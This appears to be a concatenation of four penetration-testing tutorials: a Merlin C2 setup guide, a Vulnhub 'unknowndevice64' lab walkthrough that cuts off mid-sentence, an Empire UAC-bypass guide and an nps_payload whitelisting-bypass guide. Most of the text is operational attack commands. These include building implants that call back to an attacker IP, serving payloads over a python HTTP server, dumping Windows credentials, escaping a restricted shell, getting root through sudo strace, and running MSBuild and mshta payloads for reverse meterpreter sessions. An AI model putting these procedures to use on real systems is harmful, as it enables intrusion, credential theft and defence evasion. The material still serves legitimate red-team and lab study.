Command and Control Guide to Merlin

In this article, we learn how to use Merlin C2 tool. It is developed by Russel Van Tuyl in Go language.

 

Table of content:

• Introduction
• Installation
• Windows exploitation
• Windows post exploitation
• Linux exploitation
• Linux post exploitation

·        Introduction

 

Merlin is great cross platform Command and control tool written in Go language. It’s made of two elements i.e. the server and agent. It works on HTTP/2 protocol. The best things about merlin is that it is compiled to work on any platform and that you can even build it from source. Normally, agents are put on windows and are being listened on Linux but due to being written in Go language, Merlin lets us to put agents on any platform/machine we come across and we can listen it also on any platform. This is much more successful than others when it comes to red teaming as it makes IDS/IPS struggle to identify it.

The Merlin server is to be run in the folder where agents can call out to it. By default, the server is configured on 127.0.0.1:443 but you can change it to your own IP. The merlin agent can be, as discussed earlier, cross-complicated to run on any platform. Agents are interacted using merlin server. Any binary file is executed with target’s path variable.

Installation

Merlin’s installation is pretty tricky. The most convenient way to download is shown in this article. Installing Go language is compulsory in order for merlin to work. So, to install Go language type:

apt install golang

And then to install merlin the following commands:

mkdir /opt/merlin;cd /opt/merlin

wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Once the above commands are executed successfully, use the following command to unzip merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z

Now, after unzipping, when you use ls command; you will find the merlin server and readme file. We can check if the server is running by using the following command:

./merlinServer-Linux-x64

In “README.MD”, we find the instructions for installing “Merlin” in our system.

Now according to the readme file, we have to setup GOPATH environment variable for the installation and then install merlin using “go” instead of git clone. So, to complete these steps run the following set of commands:

echo “export GOPATH=$HOME/go” >> .bashrc

source .bashrc

go get github.com/Ne0nD0g/merlin

Once the directory is downloaded, lets check its contents using cd and ls commands. 

There was a cmd directory, and in it there was a directory named merlinserver where we found main.go. Run main.go as shown in the image below :

go run main.go

As you can see the tool merlin is still not running properly as there is no SSL certificate given to it. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:

Now if you run merlin using the command: go run main.go, merlin server will run successfully. 

Now using the following help command you can see, as shown in the image, the arguments that you can use to run your commands as desired:

go run main.go -h

Windows exploitation

 

Now, to make Merlin agent for windows type the following command:

GOOS=windows GOARCH=amd64 go build -ldlags “-X main.url=https://192.168.0.11:443” -o shell.exe main.go

Now, share the shell with the target using python server:

python -m SimpleHTTPServer 80

In order to create a listener for the shell to revert, use the following command:

go run main.go -i 192.168.0.11

And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:

Type sessions to see the list of the sessions you acquire as shown in the image below:

To access the an available session use the following command:

interact

As you have accessed the session, here you can use windows commands such as:

shell ipconfig

Then further you can use various post exploitation modules, list of which are shown in the image below:

Windows post exploitation

 

We will be using a module here to dump the credentials of windows and to activate the said post exploitation module type:

use module windows/x64/powershell/credentials/dumpCredStore

As you can see in the image above that info commands gives us all the details about the module including the options that we need to specify in the module. So therefore, let’s set the options:

set agent

run

Linux exploitation

 

Now, we will make a merlin agent for Linux machine. For this, simply type the following command:

Export GOOS=linux;export GOARCH=amd64; go build -ldflags “-s -w -X main.url=https://192.168.0.11:443” -o shell.elf main.go

Once the command is executed, your malware will be created. Use the python to share the file with victim as shown in the image below or however see it fit. For starting python HTTP server:

python -m SimpleHTTPServer 80

Setup the listener and wait for the file to get executed.

go run main.go -I 192.168.0.11

And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.

Then to access the session use the following command:

interact

Then further you can use any linux command such as:

shell ls

Linux post exploitation

 

Even in linux you can further use number of post exploitation modules. The one we will be using in this article is privesc/LinEnum:

use module linux/x64/bash/priesc/LinEnum

Through info command, we know that we have to give session in order to run this module. So, type:

set agent

run 

And this way your module will run. Try and work with Merlin c2 tool as its one of best and as you can see how conveniently it is crossed-platformed.

unknowndevice64 1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “unknowndevice64: 1”. The credit for making this VM machine goes to “Ajay Verma” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

·         IP Discovery using netdiscover

·         Network scanning (Nmap)

·         Surfing HTTP service port

·         Finding image File

·         Extracting hidden file from image

·         Logging in through SSH

·         Escaping restricted shell

·         Finding binary in sudoers list

·         Getting root shell and finding flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.104

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.1.104

The NMAP output shows us that there are 2 ports open: 1337(SSH), 31337(HTTP)

We find that port 31337 is running HTTP, so we open the IP in our browser. Here we find a string “h1dden” that might be hint or a password for something.

We take a look at the source code of the web page and inside a comment we find a string called “key_is_h1dd3n.jpg”.

We open the image in our browser and download it in our system.

After downloading the image, we use steghide to extract any hidden file from the image. When we try to extract files using steghide, it prompts for a password. We use the password “h1dden” we found earlier on the webpage and were successfully able to extract a text file. We take a look at the content of the text file and find a brain fuck encoded string.

steghide extract -sf key_is_h1dden.jpg

We decode the brainfuck encoded string using this site and find a username and password.

Username: ud64

Password: 1M!#64@ud

As port 1337 is running SSH, we use the credentials we found above to login. After logging in through SSH we find that we have a restricted shell, and PATH and SHELL environment variable are read only.

ssh ud64@192.168.1.104 -p 1337

After pressing the “tab” button twice, we find the commands we can run using the restricted shell. Among those command we find that we can use Vi editor. We use Vi editor to escape the restricted shell.

:!/bin/bash

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly. Now we check sudoers list and find we can run “/usr/bin/sysud64” as root without password.

export PATH=/usr/bin:$PATH

export SHELL=/bin/bash:$SHELL

sudo -l

On checking help for “sysud64”, we find that it is actually executing strace.

sudo sysud64 -h | less

As we can run sysud64 as root and sysud64 is actually running strace command. We can spawn a shell as root user using “sysud64”. After spawning shell as root user, we switch to root directory and

sudo sysud64 -o /dev/null /bin/sh

Bypass User Access Control using Empire

Bypass User Access Control using Empire

This is fifth article in our empire series, for the basic guide to empire click here. In this article, we will learn to bypass administrator privileges using various bypassuac post exploitation methods. UAC stands for User Account Control, which means which user has how many rights to make changes in the system. The rights given too a user depends on the integrity levels; which are :

·        High : Administrator rights

·        Medium : Standard user rights

·        Low : Extremely restricted

We try and gain the highest integrity that is indicated by the number 1. Let’s start with the first exploit i.e. bypassuac_env. Now, as you can see in the image, we already have an empire session with the integrity of 0, which means we do not have admin right. So type the following set of commands to get administrator privileges :

usemodule privsec/bypassuac_env

set Listener http

execute

Executing the above module will give you a new session. Upon accessing the said session you can see the integrity has to changed to 1, which means no we have administrator rights, just as shown in the image below :

Now, let’s try another exploit which is privsec/bypassuac_eventvwr. The function of this module is the same as before i.e. to get administrator rights so we can attack more effectively. Again, as you can see, we have the session with the integrity of 0 which indicates we have no admin rights yet. So, run the following commands :

usemodule privsec/bypassuac_eventvwr

set Listener http

execute

As you can see, we have a new session with the integrity of 1 which confirms that we now have admin rights.

The next module we will use for the same purpose is privesc/bypassuac_fodhelper. Therefore just like before use the following set of commands :

usemodule privesc/bypassuac_fodhelper

set Listener http

execute

Once the module is executed, you will have the session with the integrity of 1, hence we are successful in attaining the admin rights.

Next bypassuac module we will use is privesc/bypassuac_wscript. And similarly, to have administrator privileges use the following commands :

usemodule privesc/bypassuaca_wscript

set Listener http

execute

As you can see in the image, the new session that we have gained is with admin rights.

The last module we will use for the same purpose is privesc/bypassuac. To execute the following 

commands :

usemodule privesc/bypassuac

set Listener http

execute

As you can see in the image above, the new session gained has the integrity of 1 hence the administrator rights are gained.

nps_payload: An Application Whitelisting Bypass Tool

In this article we will create payloads using a tool named nps_payload and get meterpreter sessions using those payloads. This tool is written by Larry Spohn and Ben Mauch. Find this tool on GitHub.

Attacker: Kali Linux

Target: Windows 10

Table of Content:

·         Downloading and Installing

·         Getting session using MSBuild

·         Getting session using MSBuild HTA

Downloading and Installing

First, we will get the tool in out attacker machine. It is Kali Linux in our case. The tool is available at GitHub. We will use git clone command to download it on our machine.

git clone https://github.com/trustedsec/nps_payload.git

Now we will traverse inside the folder that was downloaded using the git clone, we can check that if we have successfully downloaded the file using ls command. After that use cd to get inside the nps_payload folder. There are some requirements that are required for the nps_payload to run. Those are mentioned inside in the requirements text file. Now we can either install each of those requirements individually but that would be time taking. We will use the pip install command and then mention the requirements file. It will automatically pick the requirements from the file and install it.

pip install -r requirements.txt

Getting session using MSBuild

Now that we have successfully downloaded the tool and installed the requirements now it’s time to launch the tool and create some payloads and get some sessions. To launch the tool, we can either use command

python nps_payload.py

or we could just

./nps_payload.py

After launching the tool, we are given options to choose the technique we need to use. Is it going to be a default msbuild payload or the one in the HTA format. We are going to use both but first we will choose the default msbuild payload. Next, we have to choose the type of payload, is going to be reverse_tcp or reverse_httpor reverse_https or a custom one. We can choose anyone, but here we are choosing the reverse_tcp.

Following this we are asked to enter the Local IP Address. This is the IP address of the machine where we want the session to reach. That is the attacker machine. In our case it is Kali Linux. After that we are asked to enter the listener port. It is selected 443 by default. We are not changing it. That’s it, we are now told that the payload is successfully created as msbuild_nps.xml file. Also, we are told to start a listener.

We will start the listener before anything else. To do this we have to be inside the nps_payload folder. Now the author has provided us with a script that will create a listener for us. So, we will run it as shown below.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python  -m SimpleHTTPServer 80

Now onto the target machine. We browse the IP Address of the attacker machine and we see that we have the file msbuild_nps.xml. Now to use the msbuild to execute this xml file, we will have to shift this payload file inside this path:

C:\Windows\Microsoft.NET\Framework\v4.0.30319

Once we got the nps_payload.xml file inside the depicted path. Now we need a command prompt terminal (cmd) at that particular path. After we have a cmd at this path we will execute the nps_payload command as shown below.

MSBuild.exe msbuild_nps.xml

Now back to our attacker machine, here we created a listener earlier. We see that we have a meterpreter session. This concludes out attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit time to generate a stable session.

Getting session using MSBuild HTA

Let’s get another session using HTA file. To do this we will generate an HTA file. First, we will launch the tool using the command below.

./nps_payload.py

After launching the tool, we are going to choose the HTA payload. Next, we have to choose the type of payload, is going to be reverse_tcp or reverse_httpor reverse_https or a custom one. We can choose anyone, but here we are choosing the reverse_tcp.

Following this we are asked to enter the Local IP Address. This is the IP address of the machine where we want the session to reach. That is the attacker machine. In our case it is Kali Linux. After that we are asked to enter the listener port. It is selected 443 by default. We are not changing it. That’s it, we are now told that the payload is successfully created as msbuild_nps.hta file. Also, we are told to start a listener.

We will start the listener as we did earlier.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python  -m SimpleHTTPServer 80

Now onto the target machine. We browse the IP Address of the attacker machine and we see that we have the file msbuild_nps.hta. Right click on it and choose Save the Link As. This will download the payload.

Once we got the nps_payload.hta file. Now we need a command prompt terminal (cmd) at that path where we saved the payload file. In our case is the Downloads Folder of current user. After we have a cmd at this path we will execute the nps_payload command as shown below.

mshta.exe msbuild_nps.hta

Now back to our attacker machine, here we created a listener earlier. We see that we have a meterpreter session. This concludes out attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit time to generate a stable session.